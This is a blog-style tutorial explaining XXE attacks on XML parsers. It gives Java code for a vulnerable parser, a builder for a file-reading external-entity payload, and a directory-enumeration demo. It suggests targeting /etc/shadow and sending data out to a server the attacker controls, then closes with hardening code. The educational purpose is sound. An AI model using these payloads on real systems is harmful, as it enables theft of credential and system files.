XXE Attack Basics

March 14, 2017

The XML External Entity attack (also known as XXE) is a fairly common issue with XML parsers in web applications. Many XML parsers, including the ones that ship with Java, resolve external entities by default and are therefore exposed to this attack unless they are configured otherwise. In this article I’d like to explain the basics of how the attack works and how it can be exploited on a system.

How it works

XXE attacks rely on the “external general parsed entity” (or in short, external entity). Essentially, there is a feature in the XML standard that allows you to point to another location and say, “there is more XML information over there”. As this article says, external entities are useful for “creating a common reference that can be shared between multiple documents”.

The problem is that this nifty feature can serve as an attack vector under the right circumstances.

How to exploit

XXE vulnerabilities come in many different flavors. Some you can exploit by uploading an XML file to a website (Microsoft Word .docx files are ZIP archives full of XML...could you use that as an attack vector? Yes!). Others you can exploit by sending XML in the body of a POST request. For the purposes of this article I will create a simple XML parser using Java and then create a custom XML file that will exploit the vulnerability.

To begin, we need an XML parser. I chose Java for the language because it is a common language used for web applications (and because I haven’t played with the language in a little while).


The parser for this demo is a standard XML parser (more specifically, a DOM parser). It uses the standard Java libraries to build the factory, create a document builder, and then parse the file. After that it prints out the value of an element called “rootNode” (the name is arbitrary).
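The original listing isn't reproduced here, so the following is only a minimal sketch of the kind of parser described above, not the exact code. The class name `XxeParser` and the helper `readRootText` are placeholders of mine; the factory is deliberately left at its defaults, which is what makes it a useful target for the rest of the article.

```java
import java.io.File;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

public class XxeParser {

    // Parses the given XML file with the JDK's default DOM parser settings
    // and returns the text content of the first <rootNode> element.
    // (The method name is hypothetical; it is not from the original post.)
    static String readRootText(File xmlFile) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        DocumentBuilder builder = factory.newDocumentBuilder();
        Document doc = builder.parse(xmlFile);
        return doc.getElementsByTagName("rootNode").item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // "test.xml" is the file name used in this article.
        System.out.println(readRootText(new File("test.xml")));
    }
}
```

Nothing here is unusual, and that is the point: no security-related feature is set on the factory, so the parser handles a DOCTYPE however the JDK does by default.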

Our next goal will be to craft the XML file to perform the exploit. As you can see in the Java code, we are calling this file “test.xml”, although this name is arbitrary.


What looks like a normal XML file is so much more. We write the XML declaration on line 1. In line 2 we declare a document type called “vulnerableDocType” (again, the name is arbitrary). This is the section where we will make use of the external entity. In line 3 we create an entity called “vuln” which points at a file on the system. The file is arbitrary; you can ask for any file that the parser's process has access to. After that, in line 5, we reference the entity inside an element that the parser will read, so the parser substitutes the contents of that file as the element's value. If the developers haven’t disabled external entities and the application echoes the parsed value back, it will display this information to you.
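Since the original file isn't shown, here is a hedged reconstruction of a payload with the five-line layout described above, built in Java so it can be written out as test.xml. The class `XxePayload`, the `build` helper, and the target path in `main` are assumptions made for illustration.

```java
public class XxePayload {

    // Builds a five-line XML document whose "vuln" entity points at targetUri.
    static String build(String targetUri) {
        return String.join("\n",
            "<?xml version=\"1.0\" encoding=\"UTF-8\"?>",        // line 1: XML declaration
            "<!DOCTYPE vulnerableDocType [",                     // line 2: document type
            "  <!ENTITY vuln SYSTEM \"" + targetUri + "\">",     // line 3: external entity
            "]>",                                                // line 4: end of the DOCTYPE
            "<rootNode>&vuln;</rootNode>");                      // line 5: entity reference
    }

    public static void main(String[] args) {
        // Hypothetical target path, chosen only for illustration.
        System.out.println(build("file:///tmp/example.txt"));
    }
}
```

Saving the printed text as test.xml gives the parser a document in which `&vuln;` stands in for whatever the URI on line 3 resolves to.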

Now for a test run, let’s see what the output is!

As we can see, this file appears to be a list of passwords for various services. Pretty cool, right? Now, you may be wondering, “Nick, this doesn’t help me. How am I supposed to know what files are on the system?” Well, my little peppermint, I have good news for you! You can do directory and file enumeration!

To do this, instead of pointing the entity at a particular file, point it at a directory. If I were to change my previous example, the entity would instead point to “file:///home/nick/workspace/XXE/”. Now let’s see what happens.
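The listing comes from the way Java handles file: URLs rather than from anything XML-specific: to my knowledge, opening a file: URL that names a directory yields the entry names, one per line. The sketch below shows that behaviour on its own, outside the parser. The class name `DirectoryUrlDemo` and the throwaway directory are assumptions for the demo.

```java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.stream.Collectors;

public class DirectoryUrlDemo {

    // Reads whatever the JDK returns for the given URL as text.
    // For a file: URL that names a directory, this is expected to be
    // the names of the entries in that directory.
    static String read(URL url) throws Exception {
        try (BufferedReader reader = new BufferedReader(
                new InputStreamReader(url.openStream(), StandardCharsets.UTF_8))) {
            return reader.lines().collect(Collectors.joining("\n"));
        }
    }

    public static void main(String[] args) throws Exception {
        // Throwaway directory with one file, so the demo touches nothing real.
        Path dir = Files.createTempDirectory("xxe-demo");
        Files.createFile(dir.resolve("notes.txt"));
        System.out.println(read(dir.toUri().toURL()));
    }
}
```

An external entity that points at a directory goes through the same URL handling, which is why the parser hands back file names instead of file contents.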

Through this method you can search around for files you may want to look at. Think /etc/passwd or, if the parser is running as root, /etc/shadow.

Continuing the attack

From here you have more options depending on the configuration (or misconfiguration) of the parser. There are ways to have the parser make requests over HTTP, meaning that if the application doesn’t show the information to the user, you could have it send the data to a web server you control! The problem you will run into is newline characters in the file contents, which typically break the HTTP request. However, there are some ways around this, such as using a protocol like netdoc, gopher, or jar if the parser supports it.

If the application is written in PHP and has the expect extension loaded, you can even perform remote code execution! With the prevalence of XML parsers in modern web applications, the possibilities are endless.

For more information on how to harden your web app against this attack, check out the OWASP page on it at this link.
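As a rough idea of what that hardening looks like for the Java DOM parser used in this article, the sketch below turns on the `disallow-doctype-decl` feature, which is the commonly recommended setting for Java parsers. The class `HardenedParser` and its helper methods are names I made up for illustration, and a real application may need a different mix of settings if it legitimately relies on DTDs.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.SAXException;

public class HardenedParser {

    // Returns a factory that refuses any document containing a DOCTYPE.
    static DocumentBuilderFactory newHardenedFactory() throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }

    // Returns true if the hardened parser rejects the given XML text.
    static boolean rejects(String xml) throws Exception {
        try {
            newHardenedFactory().newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXException e) {
            // The parser raises a fatal error as soon as it meets the DOCTYPE.
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        // Hypothetical payload in the style of the one used in this article.
        String payload = "<!DOCTYPE d [<!ENTITY vuln SYSTEM \"file:///tmp/example.txt\">]>"
                + "<rootNode>&vuln;</rootNode>";
        System.out.println(rejects(payload));
    }
}
```

Because the document is refused at the DOCTYPE, the entity is never resolved and the file it points at is never read.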